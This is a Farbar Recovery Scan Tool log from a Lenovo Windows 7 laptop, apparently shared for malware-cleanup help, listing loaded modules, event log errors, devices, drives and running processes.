2010-10-20 18:23 - 2010-10-20 18:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2011-10-04 14:58 - 2011-10-04 06:04 - 00045568 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2011-10-04 14:54 - 2010-10-26 16:40 - 00049056 ____N () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
2011-10-04 14:57 - 2011-03-10 22:10 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2009-05-28 00:09 - 2009-05-28 00:09 - 00049976 _____ () C:\Program Files (x86)\LENOVO\Message Center Plus\MCPLaunch.exe
2008-03-11 15:13 - 2008-03-11 15:13 - 00788332 _____ () C:\Program Files (x86)\Digsby\lib\aspell\bin\aspell.exe
2014-01-20 16:17 - 2014-01-20 16:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 16:16 - 2014-01-20 16:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2011-10-04 14:58 - 2010-04-06 11:05 - 02085888 _____ () C:\Program Files\Lenovo\AutoLock\cv210.dll
2011-10-04 14:58 - 2010-04-06 11:04 - 02201088 _____ () C:\Program Files\Lenovo\AutoLock\cxcore210.dll
2013-09-14 03:51 - 2013-09-14 03:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\zlib1.dll
2013-09-14 03:50 - 2013-09-14 03:50 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Internet Services\libxml2.dll
2013-09-05 03:14 - 2013-09-05 03:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 18:45 - 2010-10-20 18:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2014-10-28 19:13 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
2014-10-28 19:13 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll
2014-10-28 19:13 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-28 19:13 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
2014-11-14 11:02 - 2014-11-14 11:02 - 00098816 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32api.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00110080 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\pywintypes27.dll
2014-11-14 11:02 - 2014-11-14 11:02 - 00364544 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\pythoncom27.dll
2014-11-14 11:02 - 2014-11-14 11:02 - 00045568 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_socket.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 01160704 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_ssl.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00320512 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32com.shell.shell.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00713216 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_hashlib.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 01175040 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._core_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00805888 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._gdi_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00811008 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._windows_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 01062400 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._controls_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00735232 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._misc_.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00128512 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_elementtree.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00127488 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\pyexpat.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00557056 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\pysqlite2._sqlite.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00087552 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_ctypes.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00119808 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32file.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00108544 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32security.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00007168 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\hashobjs_ext.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00167936 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32gui.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00018432 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32event.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00038912 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32inet.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00011264 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32crypt.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00070656 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._html2.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00027136 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\_multiprocessing.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00035840 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32process.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00686080 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\unicodedata.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00122368 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._wizard.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00024064 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32pipe.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00025600 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32pdh.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00525640 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\windows._lib_cacheinvalidation.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00010240 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\select.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00017408 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32profile.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00022528 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\win32ts.pyd
2014-11-14 11:02 - 2014-11-14 11:02 - 00078336 _____ () C:\Users\hstagner\AppData\Local\Temp\_MEI62442\wx._animate.pyd
2010-12-13 11:47 - 2010-12-13 11:47 - 02837504 _____ () C:\Program Files (x86)\Digsby\lib\PYTHON26.DLL
2009-05-13 18:14 - 2009-05-13 18:14 - 00043008 _____ () C:\Program Files (x86)\Digsby\lib\_socket.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00023040 _____ () C:\Program Files (x86)\Digsby\lib\_ssl.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00087040 _____ () C:\Program Files (x86)\Digsby\lib\_ctypes.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00011776 _____ () C:\Program Files (x86)\Digsby\lib\_hashlib.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00010240 _____ () C:\Program Files (x86)\Digsby\lib\select.pyd
2011-01-13 15:56 - 2011-01-13 15:56 - 00053248 _____ () C:\Program Files (x86)\Digsby\lib\sip.pyd
2010-10-21 15:55 - 2010-10-21 15:55 - 01238528 _____ () C:\Program Files (x86)\Digsby\lib\wx._wxcore.pyd
2011-02-09 13:32 - 2011-02-09 13:32 - 00381440 _____ () C:\Program Files (x86)\Digsby\lib\cgui.pyd
2011-01-10 12:59 - 2011-01-10 12:59 - 00076800 _____ () C:\Program Files (x86)\Digsby\lib\wx._webview.pyd
2011-01-10 15:52 - 2011-01-10 15:52 - 06912000 _____ () C:\Program Files (x86)\Digsby\lib\wxwebkit.dll
2009-07-13 18:03 - 2009-07-13 18:03 - 00064512 _____ () C:\Program Files (x86)\Digsby\lib\zlib1.dll
2010-06-03 10:33 - 2010-06-03 10:33 - 01236480 _____ () C:\Program Files (x86)\Digsby\lib\libxml2.dll
2009-03-17 19:21 - 2009-03-17 19:21 - 01346590 _____ () C:\Program Files (x86)\Digsby\lib\iconv.dll
2009-03-17 19:21 - 2009-03-17 19:21 - 00379090 _____ () C:\Program Files (x86)\Digsby\lib\sqlite3.dll
2009-03-17 19:21 - 2009-03-17 19:21 - 00078336 _____ () C:\Program Files (x86)\Digsby\lib\_syck.pyd
2009-03-23 16:11 - 2009-03-23 16:11 - 00026112 _____ () C:\Program Files (x86)\Digsby\lib\_jsonspeedups.pyd
2009-03-17 19:51 - 2009-03-17 19:51 - 00353280 _____ () C:\Program Files (x86)\Digsby\lib\PIL._imaging.pyd
2009-03-23 16:11 - 2009-03-23 16:11 - 00027648 _____ () C:\Program Files (x86)\Digsby\lib\_speedups.pyd
2009-03-17 19:51 - 2009-03-17 19:51 - 00014336 _____ () C:\Program Files (x86)\Digsby\lib\PIL._imagingmath.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00026624 _____ () C:\Program Files (x86)\Digsby\lib\_multiprocessing.pyd
2009-06-15 18:37 - 2009-06-15 18:37 - 00216064 _____ () C:\Program Files (x86)\Digsby\lib\lxml.objectify.pyd
2009-06-15 18:37 - 2009-06-15 18:37 - 00865280 _____ () C:\Program Files (x86)\Digsby\lib\lxml.etree.pyd
2009-06-15 18:37 - 2009-06-15 18:37 - 00213504 _____ () C:\Program Files (x86)\Digsby\lib\libxslt.dll
2009-06-15 18:37 - 2009-06-15 18:37 - 00069632 _____ () C:\Program Files (x86)\Digsby\lib\libexslt.dll
2009-03-24 15:49 - 2009-03-24 15:49 - 00249344 _____ () C:\Program Files (x86)\Digsby\lib\M2Crypto.__m2crypto.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00127488 _____ () C:\Program Files (x86)\Digsby\lib\pyexpat.pyd
2010-06-03 10:33 - 2010-06-03 10:33 - 00218112 _____ () C:\Program Files (x86)\Digsby\lib\libxmlmods.libxml2mod.pyd
2010-06-03 10:33 - 2010-06-03 10:33 - 00011776 _____ () C:\Program Files (x86)\Digsby\lib\_xmlextra.pyd
2009-05-13 18:14 - 2009-05-13 18:14 - 00583168 _____ () C:\Program Files (x86)\Digsby\lib\unicodedata.pyd
2010-03-05 16:16 - 2010-03-05 16:16 - 00044544 _____ () C:\Program Files (x86)\Digsby\lib\_sqlite3.pyd
2010-10-13 17:11 - 2010-10-13 17:11 - 00230400 _____ () C:\Program Files (x86)\Digsby\lib\wx._wxstc.pyd
2010-12-02 15:47 - 2010-12-02 15:47 - 00153088 _____ () C:\Program Files (x86)\Digsby\lib\blist.pyd
2010-10-28 16:52 - 2010-10-28 16:52 - 00462336 _____ () C:\Program Files (x86)\Digsby\lib\buddylist.dll
2009-05-13 18:14 - 2009-05-13 18:14 - 00069120 _____ () C:\Program Files (x86)\Digsby\lib\bz2.pyd
2009-03-17 19:51 - 2009-03-17 19:51 - 00350208 _____ () C:\Program Files (x86)\Digsby\lib\PIL._imagingft.pyd
2008-03-11 15:13 - 2008-03-11 15:13 - 01364823 _____ () C:\Program Files (x86)\Digsby\lib\aspell\bin\aspell-15.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:0574215C
AlternateDataStreams: C:\ProgramData\TEMP:D95ACC7D
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (1).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (2).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (3).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (4).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (5).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (6).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname (7).eml:OECustomProperty
AlternateDataStreams: C:\Users\hstagner\Downloads\noname.eml:OECustomProperty
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-3229223266-3186577701-243259943-500 - Administrator - Disabled)
Guest (S-1-5-21-3229223266-3186577701-243259943-501 - Limited - Disabled)
 
==================== Faulty Device Manager Devices =============
 
Name: Officejet Pro 8500 A909g
Description: Officejet Pro 8500 A909g
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Cisco AnyConnect VPN Virtual Miniport Adapter for Windows x64
Description: Cisco AnyConnect VPN Virtual Miniport Adapter for Windows x64
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: vpnva
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
Name: Officejet Pro 8500 A909g
Description: Officejet Pro 8500 A909g
Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Manufacturer: HP
Service: StillCam
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/14/2014 11:01:31 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/14/2014 07:59:08 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/14/2014 07:35:54 AM) (Source: VSS) (EventID: 12294) (User: )
Description: Volume Shadow Copy Service error: Error calling a routine on the Shadow Copy Provider {b5946137-7b9f-4925-af80-51abd60b20d5}. Routine returned E_INVALIDARG.
Routine details GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0).
 
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:54 AM) (Source: VSS) (EventID: 12294) (User: )
Description: Volume Shadow Copy Service error: Error calling a routine on the Shadow Copy Provider {b5946137-7b9f-4925-af80-51abd60b20d5}. Routine returned E_INVALIDARG.
Routine details GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0).
 
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:53 AM) (Source: VSS) (EventID: 12294) (User: )
Description: Volume Shadow Copy Service error: Error calling a routine on the Shadow Copy Provider {b5946137-7b9f-4925-af80-51abd60b20d5}. Routine returned E_INVALIDARG.
Routine details GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0).
 
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 40467955
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 40467955
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (11/13/2014 09:40:22 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/12/2014 06:23:18 PM) (Source: SideBySide) (EventID: 63) (User: )
Description: Activation context generation failed for "assemblyIdentity1".Error in manifest or policy file "assemblyIdentity2" on line assemblyIdentity3.
The value "6.0.0.6u9b41" of attribute "version" in element "assemblyIdentity" is invalid.
 
 
System errors:
=============
Error: (11/14/2014 00:42:31 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The Meraki VNC Server service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (11/14/2014 11:03:19 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/14/2014 11:02:25 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: CORP)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
 
Error: (11/14/2014 11:01:58 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10000) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has failed to start.
 
Module Path: C:\Windows\System32\IWMSSvc.dll
Error Code: 258
 
Error: (11/14/2014 11:01:29 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
 
Error: (11/14/2014 11:00:58 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain CORP due to the following: 
%%1311
 
This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.
 
 
 
ADDITIONAL INFO
 
If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.
 
Error: (11/14/2014 09:01:43 AM) (Source: volsnap) (EventID: 36) (User: )
Description: The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
 
Error: (11/14/2014 07:59:35 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10000) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has failed to start.
 
Module Path: C:\Windows\System32\IWMSSvc.dll
Error Code: 258
 
Error: (11/14/2014 07:59:11 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: CORP)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
 
Error: (11/14/2014 07:59:06 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
 
 
Microsoft Office Sessions:
=========================
Error: (11/14/2014 11:01:31 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/14/2014 07:59:08 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/14/2014 07:35:54 AM) (Source: VSS) (EventID: 12294) (User: )
Description: {b5946137-7b9f-4925-af80-51abd60b20d5}GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0)
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:54 AM) (Source: VSS) (EventID: 12294) (User: )
Description: {b5946137-7b9f-4925-af80-51abd60b20d5}GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0)
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:53 AM) (Source: VSS) (EventID: 12294) (User: )
Description: {b5946137-7b9f-4925-af80-51abd60b20d5}GetSnapshot({00000000-0000-0000-0000-000000000000},000000000023C0E0)
 
Operation:
   Get Shadow Copy Properties
 
Context:
   Execution Context: Coordinator
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 40467955
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 40467955
 
Error: (11/14/2014 07:35:34 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (11/13/2014 09:40:22 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (11/12/2014 06:23:18 PM) (Source: SideBySide) (EventID: 63) (User: )
Description: assemblyIdentityversion6.0.0.6u9b41C:\Program Files\Tivoli\TSM\baclient\jvm60\jre\bin\unpack200.exeC:\Program Files\Tivoli\TSM\baclient\jvm60\jre\bin\unpack200.exe19
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-2540M CPU @ 2.60GHz
Percentage of memory in use: 58%
Total physical RAM: 3978.23 MB
Available physical RAM: 1634.13 MB
Total Pagefile: 7954.65 MB
Available Pagefile: 4206.63 MB
Total Virtual: 8192 MB
Available Virtual: 8191.81 MB
 
==================== Drives ================================
 
Drive c: (Windows7_OS) (Fixed) (Total:102.44 GB) (Free:6.41 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: (My Passport) (Fixed) (Total:931.48 GB) (Free:906.58 GB) NTFS
Drive q: (Lenovo_Recovery) (Fixed) (Total:15.62 GB) (Free:6.19 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 119.2 GB) (Disk ID: E4BA5E21)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=102.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=15.6 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 00023F15)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-11-2014 02
Ran by HStagner (administrator) on HS-T420S on 14-11-2014 12:50:15
Running from C:\Users\hstagner\Downloads\Malware fix (2)
Loaded Profiles: HStagner &  (Available profiles: HStagner)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Cisco Systems, Inc.) C:\Program Files (x86)\Cisco\Cisco AnyConnect VPN Client\vpnagent.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe
(CrashPlan) C:\Program Files\CrashPlan\CrashPlanService.exe
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Juniper Networks) C:\Program Files (x86)\Common Files\Juniper Networks\JUNS\dsAccessService.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe
() C:\Program Files (x86)\Meraki\PCC Agent 1.0.87\m_agent_service.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Ntrtscan.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Professional 7\PDFProFiltSrv.exe
(Protexis Inc.) C:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe
(Birch Grove Software, Inc.) C:\Windows\SysWOW64\svctcom.exe
(IBM Corporation) C:\Program Files\Tivoli\TSM\baclient\dsmcsvc.exe
(Ulead Systems, Inc.) C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmListen.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\HostedAgent.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlk.exe
() C:\Program Files (x86)\Trend Micro\BM\TMBMSRV.exe
(Trend Micro Inc.) C:\Program Files (x86)\Trend Micro\Client Server Security Agent\TmProxy.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe
(Birch Grove Software, Inc.) C:\Windows\SysWOW64\scthost.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(Birch Grove Software, Inc.) C:\Windows\SysWOW64\trmhost.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SRORest.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo.) C:\Windows\System32\TpShocks.exe
() C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\AutoLock\ALCKRESI.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Box) C:\Users\hstagner\AppData\Local\Box\Box Edit\Box Edit.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Code 42 Software, Inc.) C:\Program Files\CrashPlan\CrashPlanTray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Ricoh co.,Ltd.) C:\Program Files (x86)\Integrated Camera Driver\X64\RCIMGDIR.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
